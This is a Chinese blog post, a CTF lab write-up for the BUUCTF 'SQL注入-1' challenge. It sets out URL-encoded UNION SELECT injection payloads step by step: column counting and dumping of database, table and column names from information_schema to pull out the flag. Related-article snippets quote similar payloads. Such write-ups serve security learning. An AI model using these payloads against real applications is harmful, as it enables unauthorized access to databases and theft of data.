BUUCTF-wp-[第一章 web入门]SQL注入-1

最新推荐文章于 2024-02-25 17:59:51 发布
最新推荐文章于 2024-02-25 17:59:51 发布
阅读量1.2k 收藏 6
点赞数 3
文章标签: web安全 sql 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53738407/article/details/121597282
版权

文章目录


又是一个小小的分享,display()
进入页面后使用最经典的单引号判断法返回与id=1时不同的错误信息,便可以得知此题存在sql注入
在这里插入图片描述

然后通过如下操作可判断其是个字符型注入
此处的判断对于此题有点冗余,两种注入的差别并不大

id=1%27%20and%201=1%20%23

id=1%27%20and%201=2%20%23

第一个返回正确信息,第二个出现错误信息note

开始进行注入

get基于报错的注入,首先通过order by判断字段名

id=1%27%20order%20by%204%20--+%20qwer

在这里插入图片描述

id=1%27%20order%20by%203%20--+%20qwer

在这里插入图片描述

3时返回正确信息,即可得出字段名为3

利用union select 联合查询,查询字段

id=0%27%20union%20select%201,2,3%20--+

在这里插入图片描述

这里注意单引号前闭合的是一个不返回正确信息的数字
因为在后台sql中为

select * from *** where id = 1

被闭合,显然是永真的,会一直返回正确信息,无法执行后续sql语句

确定好位置后,利用union select 联合查询,获取数据库名

id=0%27%20union%20select%201,database(),3%20--+qwer

在这里插入图片描述

得到数据库名后进行爆表,得到表名

id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27note%27%20--+%20qwer

在这里插入图片描述

得到表名后进行爆列

id=0%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27fl4g%27%20--+%20qwer

在这里插入图片描述

爆列完成后查看记录

id=0%27%20union%20select%201,group_concat(fllllag%20),3%20from%20fl4g%20--+%20qwer

在这里插入图片描述

即可得出flag
n1book{union_select_is_so_cool}
最后再插入一个MySql数据库元信息,让大家明白这个联合查询中不断向下的原理
在这里插入图片描述

Acco_30_L
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
[BUUCTF]-N1BOOK-[第一章 web入门]SQL注入-1 及sqlmap的简单使用
yzl_007的博客
08-28 1381
[第一章 web入门]SQL注入-1 及sqlmap的简单使用 跟着题目来学习一下sqlmap的简单使用 首先?id=1是如下结果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ked8spa3-1630160772569)(https://i.loli.net/2021/08/28/Oemn9syKg1lEcxS.png)] id=1’ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HsULWnzZ-1630160772571)(https
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4399
题目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
[第一章 web入门]SQL注入-1 题目分析与详解
最新发布
2302_79800344的博客
02-25 886
本题考查SQL注入基础。
Web入门SQL注入(一)
qq_51459823的博客
11-12 573
昨天装好了工具,今天开始入门Web吧!就以Burpsuite官方靶场作为学习Web的起点 如下知识为刷Burpsite官方靶场所得,部分为自我思考,如有错误,希望各位提出: 首先我们先了解一下: 什么是 SQL 注入 (SQLi)? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导致应用程序的内容或行为发生
[第一章 web入门]SQL注入-1
qq_43618536的博客
07-04 583
BUUCTF的[第一章 web入门]SQL注入-1
BUUCTF N1BOOK [第一章 web入门]SQL注入-1
hivjianxian的博客
11-22 642
ctf题解
菜鸡摸鱼BUUCTF-SQL注入1
weixin_45734980的博客
04-06 194
菜鸡摸鱼BUUCTF[极客大挑战 2019]EasySQL第一步:玩玩第二步:用户名注入第三步:密码注入测试第四步:注入 [极客大挑战 2019]EasySQL 这题是SQL注入最基础的题目。但是要求用户名和密码全部注入否则会报错。 第一步:玩玩 测试注入一:没注入 测试一结果:wrong 第二步:用户名注入 其实一般来讲只注入用户名就能直接过了 测试二:只注入用户名 测试二结果:密码附近有错误 返回数据说明哪里有错误,说明此处有SQL注入漏洞 第三步:密码注入测试 测试三:只注入密码 测试三
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1119
简单的SQL注入
[第一章 web入门]SQL注入
chbeloved的博客
07-20 435
[第一章 web入门]SQL注入-1 打开界面是这样,sql注入嘛那就hackbar里面动手,先查有几列,用order by 1一直到order by 4 不存在回显。 说明就三列。现在查询库,提一下前面的id=1需要改成=0或者负数让前面id那块报错才能继续查下去(个人理解)。 这里找到库的名字是note 下一步查表名,下面俩种写法都ok 表找到了 下一步找列 得到fllllag这个列,就要开始爆值。得到flag。 总结就是一步一步,爆库,表,列,值。 ...
web-stories-wp:WordPress的网络故事
02-05
建立状态 是一种免费的开放式Web视觉叙事格式,可让您轻松地通过引人入胜的动画和可点击的交互方式创建视觉叙事,并使读者沉浸在出色且快速加载的全屏体验中。 借助 ,我们提供了一流的Web Stories支持。 通过直接...
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
KSG-W-A-wp网页防篡改.doc
04-12
KSG-W-A-wp网页防篡改.doc
10039-SAFE-WP-3-SAFED软件架构.pdf
12-27
10039-SAFE-WP-3-SAFED软件架构
BUUCTF-N1BOOK-Web-SQL注入-1
m0_47154926的博客
10-06 328
判断是什么类型的注入: 至此可以判断出是字符型注入 然后开始注入,先order by判断列数 order by 3 有回显 order by 4 没有回显 所以一共三列 然后用union select进行联合查询 可以发现id=1’ union select 1,2,3 %23 并未显示(这里的1,2,3列,不知道列名可以用1,2,3来代替) 为什么要用union select? 我们需要通过注入来得到我们想要的信息,但是这个信息是在后台查询到的,并没有返回到我们手中,我们要做的是将查询..
BuuCTF之N1BOOK~SQL注入1
Yinger699的博客
09-27 482
hello~大家好!我是’今天不吃糖, 一只纯纯的小白,正在学习CTF,写文章目的是为了多积累一下解题思路 1.通过判断id=1,2,3,4发现,只有当id=4时没有回显,初次判定字段数为3. 2.判断闭合方式 (1)在id=1后加一个单引号 发现没有回显,证明不是使用单引号闭合的 (2)在单引号后添加# 发现也没有回显,大佬说,这是编码的问题,将’#进行URL编码 果然,正常回显了,达到闭合效果。 3.判断是否过滤了and和or (1)输入万能钥匙 ’ or 1=1# 证明or没被过滤 and也没有被
w3wp.exe 8288
09-06
w3wp.exe 8288 是指运行在 Windows 操作系统上的一个进程。w3wp.exe 是一个缩写,代表着"Windows 服务进程(Windows Service Process)"。而数字 8288 则是该进程的进程 ID(Process ID),每个运行在操作系统上的进程都有一个独特的进程 ID。 w3wp.exe 进程是由 Internet Information Services (IIS) 所创建和管理的。它是用于处理网络请求的关键进程,主要用来承载以 ASP.NET 为基础的 Web 应用程序。在 IIS 上运行的每个 Web 应用程序都会被分配一个独立的 w3wp.exe 进程,该进程负责处理该应用程序的所有请求和响应。 w3wp.exe 进程在运行时会占用一定的系统资源,如内存、CPU 和网络带宽等。因此,当 w3wp.exe 进程出现问题时,可能会导致整个 Web 应用程序无法正常工作,或者性能下降。 对于运维人员来说,了解 w3wp.exe 进程是很重要的,因为它可以帮助他们诊断和解决与 Web 应用程序相关的问题。他们可以通过检查 w3wp.exe 进程的日志、监控其资源使用情况,并根据情况进行调整和优化,以确保 Web 应用程序的稳定性和性能。 总之,w3wp.exe 8288 是一个 IIS 创建和管理的用于承载 ASP.NET Web 应用程序的进程。了解它的作用和特点,能够帮助我们更好地维护和优化我们的 Web 应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Acco_30_L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值